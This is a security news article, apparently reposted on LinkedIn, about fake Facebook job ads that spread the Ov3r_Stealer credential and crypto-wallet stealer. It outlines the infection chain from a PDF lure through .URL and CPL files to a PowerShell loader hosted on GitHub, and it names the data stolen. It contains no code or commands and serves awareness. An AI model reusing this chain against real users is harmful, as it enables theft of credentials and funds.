Fake Facebook Ads Spreading 'Ov3r_Stealer' To Steal Crypto And Creds
Threat actors are using fake Facebook job ads to fool victims into installing Ov3r_Stealer, a new Windows-based stealer virus.
Trustwave SpiderLabs told The Hacker News that “this malware is designed to steal credentials and crypto wallets and send them to a Telegram channel that the threat actor monitors.”
Ov3r_Stealer is designed to extract IP address-based location, hardware details, passwords, cookies, credit card info, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products from the infected host.
The campaign’s motive remains unclear; however, stolen data is often sold to other threat actors. Ov3r_Stealer may also be modified to deploy malware and other payloads, such as QakBot.
The attack initiates with a malicious PDF file seemingly hosted on OneDrive, enticing users to click on an “Access Document” button.
Trustwave discovered the PDF file posted on a fake Amazon CEO Andy Jassy Facebook account and Facebook advertisements promoting digital advertising opportunities.
Upon clicking the button, users are directed to a .URL file pretending to be a DocuSign document hosted on Discord’s CDN. A control panel item (.CPL) file is delivered through the shortcut file and executed by the Windows Control Panel process binary (“control.exe”).
Executing the CPL file triggers a PowerShell loader (“DATA1.txt”) retrieval from GitHub to execute Ov3r_Stealer.
领英推荐
Facebook Job Ads
Trend Micro recently uncovered that threat actors leveraged the Microsoft Windows Defender SmartScreen bypass vulnerability to disseminate Phemedrone Stealer through a nearly identical infection chain.
The GitHub repository (nateeintanan2527) and code-level similarities between Ov3r_Stealer and Phemedrone are noteworthy.
“This malware has recently been reported, and it may be that Phemedrone was re-purposed and renamed to Ov3r_Stealer,” warned Trustwave. “The main difference between the two is that Phemedrone is written in C#.”
Hudson Rock discovered that threat actors are advertising their access to Binance, Google, Meta, and TikTok law enforcement request portals, utilizing infostealer credentials.
Furthermore, they track CrackedCantil infections, where cracked software is employed to deploy loaders like PrivateLoader and SmokeLoader, leading to the delivery of information stealers, crypto miners, proxy botnets, and ransomware .
It's crucial for individuals and organizations to remain vigilant and exercise caution when interacting with unfamiliar links or documents, especially those originating from social media platforms.